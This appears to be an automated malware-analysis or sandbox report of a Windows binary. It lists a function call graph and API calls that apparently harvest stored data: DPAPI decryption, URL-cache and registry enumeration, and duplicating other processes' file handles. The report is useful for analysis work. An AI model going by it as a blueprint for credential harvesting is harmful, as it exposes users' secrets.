39452 403dbe 39446->39452 39447 403e1e 40360 40b1ab ??3@YAXPAX ??3@YAXPAX 39447->40360 39449 403dca memset 39449->39452 39450 403e26 39450->39087 39451 4099c6 2 API calls 39451->39452 39452->39447 39452->39449 39452->39451 39453 40a8ab 9 API calls 39452->39453 39453->39452 39455 414b81 9 API calls 39454->39455 39456 414c40 39455->39456 39457 414c73 memset 39456->39457 40361 409cea 39456->40361 39459 414c94 39457->39459 40364 414592 RegOpenKeyExW 39459->40364 39462 414c64 SHGetSpecialFolderPathW 39464 414d0b 39462->39464 39463 414cc1 39465 414cf4 wcscpy 39463->39465 40365 414bb0 wcscpy 39463->40365 39464->39078 39465->39464 39467 414cd2 40366 4145ac RegQueryValueExW 39467->40366 39469 414ce9 RegCloseKey 39469->39465 39471 409d62 39470->39471 39472 409d43 wcscpy 39470->39472 39471->39119 39473 409719 2 API calls 39472->39473 39474 409d51 wcscat 39473->39474 39474->39471 39476 40aebe FindClose 39475->39476 39477 40ae21 39476->39477 39478 4099c6 2 API calls 39477->39478 39479 40ae35 39478->39479 39480 409d1f 6 API calls 39479->39480 39481 40ae49 39480->39481 39481->39154 39483 40ade0 39482->39483 39484 40ae0f 39482->39484 39483->39484 39485 40ade7 wcscmp 39483->39485 39484->39154 39485->39484 39486 40adfe wcscmp 39485->39486 39486->39484 39488 40ae18 9 API calls 39487->39488 39490 4453c4 39488->39490 39489 40ae51 9 API calls 39489->39490 39490->39489 39491 4453f3 39490->39491 39492 40add4 2 API calls 39490->39492 39495 445403 254 API calls 39490->39495 39493 40aebe FindClose 39491->39493 39492->39490 39494 4453fe 39493->39494 39494->39154 39495->39490 39497 40ae7b FindNextFileW 39496->39497 39498 40ae5c FindFirstFileW 39496->39498 39499 40ae94 39497->39499 39500 40ae8f 39497->39500 39498->39499 39502 40aeb6 39499->39502 39503 409d1f 6 API calls 39499->39503 39501 40aebe FindClose 39500->39501 39501->39499 39502->39154 39503->39502 39504->39086 39505->39140 39506->39121 39507->39121 39508->39155 39510 409c89 39509->39510 39510->39177 39511->39207 39513 413d39 39512->39513 39514 413d2f FreeLibrary 39512->39514 39515 40b633 ??3@YAXPAX 39513->39515 39514->39513 39516 413d42 39515->39516 39517 40b633 ??3@YAXPAX 39516->39517 39518 413d4a 39517->39518 39518->39037 39519->39040 39520->39089 39521->39103 39523 44db70 39522->39523 39524 40b6fc memset 39523->39524 39525 409c70 2 API calls 39524->39525 39526 40b732 wcsrchr 39525->39526 39527 40b743 39526->39527 39528 40b746 memset 39526->39528 39527->39528 39529 40b2cc 27 API calls 39528->39529 39530 40b76f 39529->39530 39531 409d1f 6 API calls 39530->39531 39532 40b783 39531->39532 40367 409b98 GetFileAttributesW 39532->40367 39534 40b792 39535 40b7c2 39534->39535 39536 409c70 2 API calls 39534->39536 40368 40bb98 39535->40368 39538 40b7a5 39536->39538 39540 40b2cc 27 API calls 39538->39540 39544 40b7b2 39540->39544 39541 40b837 FindCloseChangeNotification 39543 40b83e memset 39541->39543 39542 40b817 39545 409a45 3 API calls 39542->39545 40401 40a6e6 WideCharToMultiByte 39543->40401 39547 409d1f 6 API calls 39544->39547 39548 40b827 CopyFileW 39545->39548 39547->39535 39548->39543 39549 40b866 39550 444432 121 API calls 39549->39550 39551 40b879 39550->39551 39552 40bad5 39551->39552 39553 40b273 27 API calls 39551->39553 39554 40baeb 39552->39554 39555 40bade DeleteFileW 39552->39555 39556 40b89a 39553->39556 39557 40b04b ??3@YAXPAX 39554->39557 39555->39554 39558 438552 134 API calls 39556->39558 39559 40baf3 39557->39559 39560 40b8a4 39558->39560 39559->39113 39561 40bacd 39560->39561 39563 4251c4 137 API calls 39560->39563 39562 443d90 111 API calls 39561->39562 39562->39552 39586 40b8b8 39563->39586 39564 40bac6 40411 424f26 123 API calls 39564->40411 39565 40b8bd memset 40402 425413 17 API calls 39565->40402 39568 425413 17 API calls 39568->39586 39571 40a71b MultiByteToWideChar 39571->39586 39572 40a734 MultiByteToWideChar 39572->39586 39575 40b9b5 memcmp 39575->39586 39576 4099c6 2 API calls 39576->39586 39577 404423 38 API calls 39577->39586 39579 40bb3e memset memcpy 40412 40a734 MultiByteToWideChar 39579->40412 39580 4251c4 137 API calls 39580->39586 39583 40bb88 LocalFree 39583->39586 39586->39564 39586->39565 39586->39568 39586->39571 39586->39572 39586->39575 39586->39576 39586->39577 39586->39579 39586->39580 39587 40ba5f memcmp 39586->39587 40403 4253ef 16 API calls 39586->40403 40404 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 39586->40404 40405 4253af 17 API calls 39586->40405 40406 4253cf 17 API calls 39586->40406 40407 447280 memset 39586->40407 40408 447960 memset memcpy memcpy memcpy 39586->40408 40409 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 39586->40409 40410 447920 memcpy memcpy memcpy 39586->40410 39587->39586 39588->39115 39590 40aed1 39589->39590 39591 40aec7 FindClose 39589->39591 39590->39048 39591->39590 39593 4099d7 39592->39593 39594 4099da memcpy 39592->39594 39593->39594 39594->39098 39596 40b2cc 27 API calls 39595->39596 39597 44543f 39596->39597 39598 409d1f 6 API calls 39597->39598 39599 44544f 39598->39599 40504 409b98 GetFileAttributesW 39599->40504 39601 44545e 39602 445476 39601->39602 39603 40b6ef 253 API calls 39601->39603 39604 40b2cc 27 API calls 39602->39604 39603->39602 39605 445482 39604->39605 39606 409d1f 6 API calls 39605->39606 39607 445492 39606->39607 40505 409b98 GetFileAttributesW 39607->40505 39609 4454a1 39610 4454b9 39609->39610 39611 40b6ef 253 API calls 39609->39611 39610->39129 39611->39610 39612->39128 39613->39145 39614->39151 39615->39188 39616->39170 39617->39215 39618->39215 39619->39198 39620->39226 39621->39228 39622->39230 39624 414c2e 17 API calls 39623->39624 39625 40c2ae 39624->39625 39695 40c1d3 39625->39695 39630 40c3be 39647 40a8ab 39630->39647 39631 40afcf 2 API calls 39632 40c2fd FindFirstUrlCacheEntryW 39631->39632 39633 40c3b6 39632->39633 39634 40c31e wcschr 39632->39634 39635 40b04b ??3@YAXPAX 39633->39635 39636 40c331 39634->39636 39637 40c35e FindNextUrlCacheEntryW 39634->39637 39635->39630 39639 40a8ab 9 API calls 39636->39639 39637->39634 39638 40c373 GetLastError 39637->39638 39640 40c3ad FindCloseUrlCache 39638->39640 39641 40c37e 39638->39641 39642 40c33e wcschr 39639->39642 39640->39633 39643 40afcf 2 API calls 39641->39643 39642->39637 39644 40c34f 39642->39644 39645 40c391 FindNextUrlCacheEntryW 39643->39645 39646 40a8ab 9 API calls 39644->39646 39645->39634 39645->39640 39646->39637 39850 40a97a 39647->39850 39650 40a8cc 39650->39237 39651 40a8d0 7 API calls 39651->39650 39855 40b1ab ??3@YAXPAX ??3@YAXPAX 39652->39855 39654 40c3dd 39655 40b2cc 27 API calls 39654->39655 39656 40c3e7 39655->39656 39856 414592 RegOpenKeyExW 39656->39856 39658 40c3f4 39659 40c50e 39658->39659 39660 40c3ff 39658->39660 39674 405337 39659->39674 39661 40a9ce 4 API calls 39660->39661 39662 40c418 memset 39661->39662 39857 40aa1d 39662->39857 39665 40c471 39667 40c47a _wcsupr 39665->39667 39666 40c505 RegCloseKey 39666->39659 39668 40a8d0 7 API calls 39667->39668 39669 40c498 39668->39669 39670 40a8d0 7 API calls 39669->39670 39671 40c4ac memset 39670->39671 39672 40aa1d 39671->39672 39673 40c4e4 RegEnumValueW 39672->39673 39673->39666 39673->39667 39859 405220 39674->39859 39678 4099c6 2 API calls 39677->39678 39679 40a714 _wcslwr 39678->39679 39680 40c634 39679->39680 39916 405361 39680->39916 39683 40c65c wcslen 39919 4053b6 39 API calls 39683->39919 39684 40c71d wcslen 39684->39251 39686 40c677 39687 40c713 39686->39687 39920 40538b 39 API calls 39686->39920 39922 4053df 39 API calls 39687->39922 39690 40c6a5 39690->39687 39691 40c6a9 memset 39690->39691 39692 40c6d3 39691->39692 39921 40c589 44 API calls 39692->39921 39694->39244 39696 40ae18 9 API calls 39695->39696 39702 40c210 39696->39702 39697 40ae51 9 API calls 39697->39702 39698 40c264 39699 40aebe FindClose 39698->39699 39701 40c26f 39699->39701 39700 40add4 2 API calls 39700->39702 39707 40e5ed memset memset 39701->39707 39702->39697 39702->39698 39702->39700 39703 40c231 _wcsicmp 39702->39703 39704 40c1d3 35 API calls 39702->39704 39703->39702 39705 40c248 39703->39705 39704->39702 39720 40c084 22 API calls 39705->39720 39708 414c2e 17 API calls 39707->39708 39709 40e63f 39708->39709 39710 409d1f 6 API calls 39709->39710 39711 40e658 39710->39711 39721 409b98 GetFileAttributesW 39711->39721 39713 40e667 39715 409d1f 6 API calls 39713->39715 39716 40e680 39713->39716 39715->39716 39722 409b98 GetFileAttributesW 39716->39722 39717 40e68f 39718 40c2d8 39717->39718 39723 40e4b2 39717->39723 39718->39630 39718->39631 39720->39702 39721->39713 39722->39717 39744 40e01e 39723->39744 39725 40e593 39726 40e5b0 39725->39726 39727 40e59c DeleteFileW 39725->39727 39728 40b04b ??3@YAXPAX 39726->39728 39727->39726 39730 40e5bb 39728->39730 39729 40e521 39729->39725 39767 40e175 39729->39767 39732 40e5c4 CloseHandle 39730->39732 39733 40e5cc 39730->39733 39732->39733 39735 40b633 ??3@YAXPAX 39733->39735 39734 40e573 39736 40e584 39734->39736 39737 40e57c FindCloseChangeNotification 39734->39737 39738 40e5db 39735->39738 39788 40b1ab ??3@YAXPAX ??3@YAXPAX 39736->39788 39737->39736 39741 40b633 ??3@YAXPAX 39738->39741 39740 40e540 39740->39734 39787 40e2ab 30 API calls 39740->39787 39742 40e5e3 39741->39742 39742->39718 39789 406214 39744->39789 39747 40e16b 39747->39729 39750 40afcf 2 API calls 39751 40e08d OpenProcess 39750->39751 39752 40e0a4 GetCurrentProcess DuplicateHandle 39751->39752 39756 40e152 39751->39756 39753 40e0d0 GetFileSize 39752->39753 39754 40e14a CloseHandle 39752->39754 39825 409a45 GetTempPathW 39753->39825 39754->39756 39755 40e160 39759 40b04b ??3@YAXPAX 39755->39759 39756->39755 39758 406214 22 API calls 39756->39758 39758->39755 39759->39747 39760 40e0ea 39828 4096dc CreateFileW 39760->39828 39762 40e0f1 CreateFileMappingW 39763 40e140 CloseHandle CloseHandle 39762->39763 39764 40e10b MapViewOfFile 39762->39764 39763->39754 39765 40e13b FindCloseChangeNotification 39764->39765 39766 40e11f WriteFile UnmapViewOfFile 39764->39766 39765->39763 39766->39765 39768 40e18c 39767->39768 39829 406b90 39768->39829 39771 40e1a7 memset 39777 40e1e8 39771->39777 39772 40e299 39839 4069a3 39772->39839 39778 40e283 39777->39778 39779 40dd50 _wcsicmp 39777->39779 39785 40e244 _snwprintf 39777->39785 39846 406e8f 13 API calls 39777->39846 39847 40742e 8 API calls 39777->39847 39848 40aae3 wcslen wcslen _memicmp 39777->39848 39849 406b53 SetFilePointerEx ReadFile 39777->39849 39780 40e291 39778->39780 39781 40e288 ??3@YAXPAX 39778->39781 39779->39777 39782 40aa04 ??3@YAXPAX 39780->39782 39781->39780 39782->39772 39786 40a8d0 7 API calls 39785->39786 39786->39777 39787->39740 39788->39725 39790 406294 CloseHandle 39789->39790 39791 406224 39790->39791 39792 4096c3 CreateFileW 39791->39792 39793 40622d 39792->39793 39794 406281 GetLastError 39793->39794 39796 40a2ef ReadFile 39793->39796 39795 40625a 39794->39795 39795->39747 39800 40dd85 memset 39795->39800 39797 406244 39796->39797 39797->39794 39798 40624b 39797->39798 39798->39795 39799 406777 19 API calls 39798->39799 39799->39795 39801 409bca GetModuleFileNameW 39800->39801 39802 40ddbe CreateFileW 39801->39802 39805 40ddf1 39802->39805 39803 40afcf ??2@YAPAXI ??3@YAXPAX 39803->39805 39804 41352f 9 API calls 39804->39805 39805->39803 39805->39804 39806 40de0b NtQuerySystemInformation 39805->39806 39807 40de3b FindCloseChangeNotification GetCurrentProcessId 39805->39807 39806->39805 39808 40de54 39807->39808 39809 413d4c 46 API calls 39808->39809 39817 40de88 39809->39817 39810 40e00c 39811 413d29 ??3@YAXPAX FreeLibrary 39810->39811 39812 40e014 39811->39812 39812->39747 39812->39750 39813 40dea9 _wcsicmp 39814 40dee7 OpenProcess 39813->39814 39815 40debd _wcsicmp 39813->39815 39814->39817 39815->39814 39816 40ded0 _wcsicmp 39815->39816 39816->39814 39816->39817 39817->39810 39817->39813 39818 40dfef CloseHandle 39817->39818 39819 40df23 GetCurrentProcess DuplicateHandle 39817->39819 39822 40df8f CloseHandle 39817->39822 39823 40df78 39817->39823 39818->39817 39819->39817 39820 40df4c memset 39819->39820 39821 41352f 9 API calls 39820->39821 39821->39817 39822->39823 39823->39818 39823->39822 39824 40dfae _wcsicmp 39823->39824 39824->39817 39824->39823 39826 409a74 GetTempFileNameW 39825->39826 39827 409a66 GetWindowsDirectoryW 39825->39827 39826->39760 39827->39826 39828->39762 39830 406bd5 39829->39830 39831 406bad 39829->39831 39833 406c0f 39830->39833 39834 4066bf ??3@YAXPAX malloc memcpy ??3@YAXPAX ??3@YAXPAX 39830->39834 39831->39830 39832 406bba _wcsicmp 39831->39832 39832->39830 39832->39831 39833->39771 39833->39772 39835 406be5 39834->39835 39835->39833 39836 40afcf ??2@YAPAXI ??3@YAXPAX 39835->39836 39837 406bff 39836->39837 39838 4068bf SetFilePointerEx memcpy ReadFile ??2@YAPAXI ??3@YAXPAX 39837->39838 39838->39833 39840 4069c4 ??3@YAXPAX 39839->39840 39841 4069af 39840->39841 39842 40b633 ??3@YAXPAX 39841->39842 39843 4069ba 39842->39843 39844 40b04b ??3@YAXPAX 39843->39844 39845 4069c2 39844->39845 39845->39740 39846->39777 39847->39777 39848->39777 39849->39777 39851 40a980 39850->39851 39852 40a995 _wcsicmp 39851->39852 39853 40a99c wcscmp 39851->39853 39854 40a8bb 39851->39854 39852->39851 39853->39851 39854->39650 39854->39651 39855->39654 39856->39658 39858 40aa23 RegEnumValueW 39857->39858 39858->39665 39858->39666 39860 405335 39859->39860 39861 40522a 39859->39861 39860->39251 39862 40b2cc 27 API calls 39861->39862 39863 405234 39862->39863 39864 40a804 8 API calls 39863->39864 39865 40523a 39864->39865 39904 40b273 39865->39904 39867 405248 _mbscpy _mbscat GetProcAddress 39868 40b273 27 API calls 39867->39868 39869 405279 39868->39869 39907 405211 GetProcAddress 39869->39907 39871 405282 39872 40b273 27 API calls 39871->39872 39873 40528f 39872->39873 39908 405211 GetProcAddress 39873->39908 39875 405298 39876 40b273 27 API calls 39875->39876 39877 4052a5 39876->39877 39909 405211 GetProcAddress 39877->39909 39879 4052ae 39880 40b273 27 API calls 39879->39880 39881 4052bb 39880->39881 39910 405211 GetProcAddress 39881->39910 39883 4052c4 39884 40b273 27 API calls 39883->39884 39885 4052d1 39884->39885 39905 40b58d 27 API calls 39904->39905 39906 40b18c 39905->39906 39906->39867 39907->39871 39908->39875 39909->39879 39910->39883 39917 405220 39 API calls 39916->39917 39918 405369 39917->39918 39918->39683 39918->39684 39919->39686 39920->39690 39921->39687 39922->39684 39924 40440c FreeLibrary 39923->39924 39925 40436d 39924->39925 39926 40a804 8 API calls 39925->39926 39927 404377 39926->39927 39928 404383 39927->39928 39929 404405 39927->39929 39930 40b273 27 API calls 39928->39930 39929->39256 39929->39257 39929->39258 39931 40438d GetProcAddress 39930->39931 39932 40b273 27 API calls 39931->39932 39933 4043a7 GetProcAddress 39932->39933 39934 40b273 27 API calls 39933->39934 39935 4043ba GetProcAddress 39934->39935 39936 40b273 27 API calls 39935->39936 39937 4043ce GetProcAddress 39936->39937 39938 40b273 27 API calls 39937->39938 39939 4043e2 GetProcAddress 39938->39939 39940 4043f1 39939->39940 39941 4043f7 39940->39941 39942 40440c FreeLibrary 39940->39942 39941->39929 39942->39929 39944 404413 FreeLibrary 39943->39944 39945 40441e 39943->39945 39944->39945 39945->39273 39946->39267 39948 40447e 39947->39948 39949 40442e 39947->39949 39950 404485 CryptUnprotectData 39948->39950 39951 40449c 39948->39951 39952 40b2cc 27 API calls 39949->39952 39950->39951 39951->39267 39953 404438 39952->39953 39954 40a804 8 API calls 39953->39954 39955 40443e 39954->39955 39956 404445 39955->39956 39957 404467 39955->39957 39958 40b273 27 API calls 39956->39958 39957->39948 39960 404475 FreeLibrary 39957->39960 39959 40444f GetProcAddress 39958->39959 39959->39957 39961 404460 39959->39961 39960->39948 39961->39957 39963 4135f6 39962->39963 39964 4135eb FreeLibrary 39962->39964 39963->39276 39964->39963 39992 403a29 39991->39992 40006 403bed memset memset 39992->40006 39994 403ae7 40019 40b1ab ??3@YAXPAX ??3@YAXPAX 39994->40019 39996 403a3f memset 39999 403a2f 39996->39999 39997 403aef 39997->39312 39998 409d1f 6 API calls 39998->39999 39999->39994 39999->39996 39999->39998 40000 409b98 GetFileAttributesW 39999->40000 40001 40a8d0 7 API calls 39999->40001 40000->39999 40001->39999 40003 40a051 GetFileTime FindCloseChangeNotification 40002->40003 40004 4039ca CompareFileTime 40002->40004 40003->40004 40004->39312 40005->39311 40007 414c2e 17 API calls 40006->40007 40008 403c38 40007->40008 40009 409719 2 API calls 40008->40009 40010 403c3f wcscat 40009->40010 40011 414c2e 17 API calls 40010->40011 40012 403c61 40011->40012 40013 409719 2 API calls 40012->40013 40014 403c68 wcscat 40013->40014 40020 403af5 40014->40020 40017 403af5 20 API calls 40018 403c95 40017->40018 40018->39999 40019->39997 40021 403b02 40020->40021 40022 40ae18 9 API calls 40021->40022 40030 403b37 40022->40030 40023 403bdb 40024 40aebe FindClose 40023->40024 40025 403be6 40024->40025 40025->40017 40026 40ae18 9 API calls 40026->40030 40027 40ae51 9 API calls 40027->40030 40028 40add4 wcscmp wcscmp 40028->40030 40029 40aebe FindClose 40029->40030 40030->40023 40030->40026 40030->40027 40030->40028 40030->40029 40031 40a8d0 7 API calls 40030->40031 40031->40030 40033 409d1f 6 API calls 40032->40033 40034 404190 40033->40034 40047 409b98 GetFileAttributesW 40034->40047 40036 40419c 40037 4041a7 6 API calls 40036->40037 40038 40435c 40036->40038 40040 40424f 40037->40040 40038->39338 40040->40038 40041 40425e memset 40040->40041 40043 409d1f 6 API calls 40040->40043 40044 40a8ab 9 API calls 40040->40044 40048 414842 40040->40048 40041->40040 40042 404296 wcscpy 40041->40042 40042->40040 40043->40040 40045 4042b6 memset memset _snwprintf wcscpy 40044->40045 40045->40040 40046->39336 40047->40036 40051 41443e 40048->40051 40050 414866 40050->40040 40052 41444b 40051->40052 40053 414451 40052->40053 40054 4144a3 GetPrivateProfileStringW 40052->40054 40055 414491 40053->40055 40056 414455 wcschr 40053->40056 40054->40050 40057 414495 WritePrivateProfileStringW 40055->40057 40056->40055 40058 414463 _snwprintf 40056->40058 40057->40050 40058->40057 40059->39342 40061 40b2cc 27 API calls 40060->40061 40062 409615 40061->40062 40063 409d1f 6 API calls 40062->40063 40064 409625 40063->40064 40089 409b98 GetFileAttributesW 40064->40089 40066 409634 40067 409648 40066->40067 40090 4091b8 memset 40066->40090 40069 40b2cc 27 API calls 40067->40069 40071 408801 40067->40071 40070 40965d 40069->40070 40072 409d1f 6 API calls 40070->40072 40071->39345 40071->39372 40073 40966d 40072->40073 40142 409b98 GetFileAttributesW 40073->40142 40089->40066 40144 40a6e6 WideCharToMultiByte 40090->40144 40092 409202 40145 444432 40092->40145 40144->40092 40223 4438b5 40145->40223 40147 44444c 40224 4438d0 40223->40224 40234 4438c9 40223->40234 40292 415378 memcpy memcpy 40224->40292 40234->40147 40351 413f4f 40324->40351 40327 413f37 K32GetModuleFileNameExW 40328 413f4a 40327->40328 40328->39402 40330 413969 wcscpy 40329->40330 40331 41396c wcschr 40329->40331 40334 413a3a 40330->40334 40331->40330 40333 41398e 40331->40333 40356 4097f7 wcslen wcslen _memicmp 40333->40356 40334->39402 40336 41399a 40337 4139a4 memset 40336->40337 40338 4139e6 40336->40338 40357 409dd5 GetWindowsDirectoryW wcscpy 40337->40357 40340 413a31 wcscpy 40338->40340 40341 4139ec memset 40338->40341 40340->40334 40358 409dd5 GetWindowsDirectoryW wcscpy 40341->40358 40342 4139c9 wcscpy wcscat 40342->40334 40344 413a11 memcpy wcscat 40344->40334 40346 413cb0 GetModuleHandleW 40345->40346 40347 413cda 40345->40347 40346->40347 40350 413cbf GetProcAddress 40346->40350 40348 413ce3 GetProcessTimes 40347->40348 40349 413cf6 40347->40349 40348->39407 40349->39407 40350->40347 40352 413f2f 40351->40352 40353 413f54 40351->40353 40352->40327 40352->40328 40354 40a804 8 API calls 40353->40354 40355 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 40354->40355 40355->40352 40356->40336 40357->40342 40358->40344 40359->39427 40360->39450 40362 409cf9 GetVersionExW 40361->40362 40363 409d0a 40361->40363 40362->40363 40363->39457 40363->39462 40364->39463 40365->39467 40366->39469 40367->39534 40369 40bba5 40368->40369 40413 40cc26 40369->40413 40372 40bd4b 40434 40cc0c 40372->40434 40377 40b2cc 27 API calls 40378 40bbef 40377->40378 40441 40ccf0 _wcsicmp 40378->40441 40380 40bbf5 40380->40372 40442 40ccb4 6 API calls 40380->40442 40382 40bc26 40383 40cf04 17 API calls 40382->40383 40384 40bc2e 40383->40384 40385 40bd43 40384->40385 40386 40b2cc 27 API calls 40384->40386 40387 40cc0c 4 API calls 40385->40387 40388 40bc40 40386->40388 40387->40372 40443 40ccf0 _wcsicmp 40388->40443 40390 40bc46 40390->40385 40391 40bc61 memset memset WideCharToMultiByte 40390->40391 40444 40103c strlen 40391->40444 40393 40bcc0 40394 40b273 27 API calls 40393->40394 40395 40bcd0 memcmp 40394->40395 40395->40385 40396 40bce2 40395->40396 40397 404423 38 API calls 40396->40397 40398 40bd10 40397->40398 40398->40385 40399 40bd3a LocalFree 40398->40399 40400 40bd1f memcpy 40398->40400 40399->40385 40400->40399 40401->39549 40402->39586 40403->39586 40404->39586 40405->39586 40406->39586 40407->39586 40408->39586 40409->39586 40410->39586 40411->39561 40412->39583 40445 4096c3 CreateFileW 40413->40445 40415 40cc34 40416 40cc3d GetFileSize 40415->40416 40417 40bbca 40415->40417 40418 40afcf 2 API calls 40416->40418 40417->40372 40425 40cf04 40417->40425 40419 40cc64 40418->40419 40446 40a2ef ReadFile 40419->40446 40421 40cc71 40447 40ab4a MultiByteToWideChar 40421->40447 40423 40cc95 FindCloseChangeNotification 40424 40b04b ??3@YAXPAX 40423->40424 40424->40417 40426 40b633 ??3@YAXPAX 40425->40426 40427 40cf14 40426->40427 40453 40b1ab ??3@YAXPAX ??3@YAXPAX 40427->40453 40429 40cf1b 40430 40cfef 40429->40430 40433 40bbdd 40429->40433 40454 40cd4b 40429->40454 40432 40cd4b 14 API calls 40430->40432 40432->40433 40433->40372 40433->40377 40435 40b633 ??3@YAXPAX 40434->40435 40436 40cc15 40435->40436 40437 40aa04 ??3@YAXPAX 40436->40437 40438 40cc1d 40437->40438 40503 40b1ab ??3@YAXPAX ??3@YAXPAX 40438->40503 40440 40b7d4 memset CreateFileW 40440->39541 40440->39542 40441->40380 40442->40382 40443->40390 40444->40393 40445->40415 40446->40421 40448 40ab93 40447->40448 40449 40ab6b 40447->40449 40448->40423 40450 40a9ce 4 API calls 40449->40450 40451 40ab74 40450->40451 40452 40ab7c MultiByteToWideChar 40451->40452 40452->40448 40453->40429 40455 40cd7b 40454->40455 40488 40aa29 40455->40488 40457 40cef5 40458 40aa04 ??3@YAXPAX 40457->40458 40459 40cefd 40458->40459 40459->40429 40461 40aa29 6 API calls 40462 40ce1d 40461->40462 40463 40aa29 6 API calls 40462->40463 40464 40ce3e 40463->40464 40465 40ce6a 40464->40465 40496 40abb7 wcslen memmove 40464->40496 40466 40ce9f 40465->40466 40499 40abb7 wcslen memmove 40465->40499 40469 40a8d0 7 API calls 40466->40469 40474 40ceb5 40469->40474 40470 40ce56 40497 40aa71 wcslen 40470->40497 40471 40ce8b 40500 40aa71 wcslen 40471->40500 40476 40a8d0 7 API calls 40474->40476 40475 40ce5e 40498 40abb7 wcslen memmove 40475->40498 40479 40cecb 40476->40479 40477 40ce93 40501 40abb7 wcslen memmove 40477->40501 40502 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 40479->40502 40482 40cedd 40483 40aa04 ??3@YAXPAX 40482->40483 40484 40cee5 40483->40484 40485 40aa04 ??3@YAXPAX 40484->40485 40486 40ceed 40485->40486 40487 40aa04 ??3@YAXPAX 40486->40487 40487->40457 40489 40aa33 40488->40489 40490 40aa63 40488->40490 40491 40aa44 40489->40491 40492 40aa38 wcslen 40489->40492 40490->40457 40490->40461 40493 40a9ce 4 API calls 40491->40493 40492->40491 40494 40aa4d 40493->40494 40494->40490 40495 40aa51 memcpy 40494->40495 40495->40490 40496->40470 40497->40475 40498->40465 40499->40471 40500->40477 40501->40466 40502->40482 40503->40440 40504->39601 40505->39609 40506 441819 40509 430737 40506->40509 40508 441825 40508->40508 40510 430756 40509->40510 40522 43076d 40509->40522 40511 430774 40510->40511 40512 43075f 40510->40512 40524 43034a memcpy 40511->40524 40523 4169a7 11 API calls 40512->40523 40515 4307ce 40517 430819 memset 40515->40517 40525 415b2c 40515->40525 40516 43077e 40516->40515 40520 4307fa 40516->40520 40516->40522 40517->40522 40519 4307e9 40519->40517 40519->40522 40532 4169a7 11 API calls 40520->40532 40522->40508 40523->40522 40524->40516 40526 415b46 40525->40526 40527 415b42 40525->40527 40526->40519 40527->40526 40528 415b94 40527->40528 40529 415b5a 40527->40529 40530 4438b5 10 API calls 40528->40530 40529->40526 40531 415b79 memcpy 40529->40531 40530->40526 40531->40526 40532->40522 40533 41493c EnumResourceNamesW

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 283 40dd85-40ddeb memset call 409bca CreateFileW 286 40ddf1-40de09 call 40afcf call 41352f 283->286 291 40de0b-40de1a NtQuerySystemInformation 286->291 292 40de1c 286->292 293 40de20-40de27 291->293 292->293 294 40de29-40de39 293->294 295 40de3b-40de52 FindCloseChangeNotification GetCurrentProcessId 293->295 294->286 294->295 296 40de54-40de58 295->296 297 40de7a-40de8e call 413cfa call 413d4c 295->297 296->297 298 40de5a 296->298 307 40de94-40debb call 40e6ad call 409c52 _wcsicmp 297->307 308 40e00c-40e01b call 413d29 297->308 300 40de5d-40de63 298->300 302 40de74-40de78 300->302 303 40de65-40de6c 300->303 302->297 302->300 303->302 305 40de6e-40de71 303->305 305->302 315 40dee7-40def7 OpenProcess 307->315 316 40debd-40dece _wcsicmp 307->316 318 40dff8-40dffb 315->318 319 40defd-40df02 315->319 316->315 317 40ded0-40dee1 _wcsicmp 316->317 317->315 320 40dffd-40e006 317->320 318->308 318->320 321 40df08 319->321 322 40dfef-40dff2 CloseHandle 319->322 320->307 320->308 323 40df0b-40df10 321->323 322->318 324 40df16-40df1d 323->324 325 40dfbd-40dfcb 323->325 324->325 327 40df23-40df4a GetCurrentProcess DuplicateHandle 324->327 325->323 326 40dfd1-40dfd3 325->326 326->322 327->325 328 40df4c-40df76 memset call 41352f 327->328 331 40df78-40df8a 328->331 332 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 328->332 331->332 332->325 337 40dfd5-40dfed 332->337 337->322
                          APIs
                          • memset.MSVCRT ref: 0040DDAD
                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                          • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                            • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                          • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                          • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                          • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                          • _wcsicmp.MSVCRT ref: 0040DEB2
                          • _wcsicmp.MSVCRT ref: 0040DEC5
                          • _wcsicmp.MSVCRT ref: 0040DED8
                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                          • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                          • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                          • memset.MSVCRT ref: 0040DF5F
                          • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                          • _wcsicmp.MSVCRT ref: 0040DFB2
                          • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                          Strings
                          Memory Dump Source
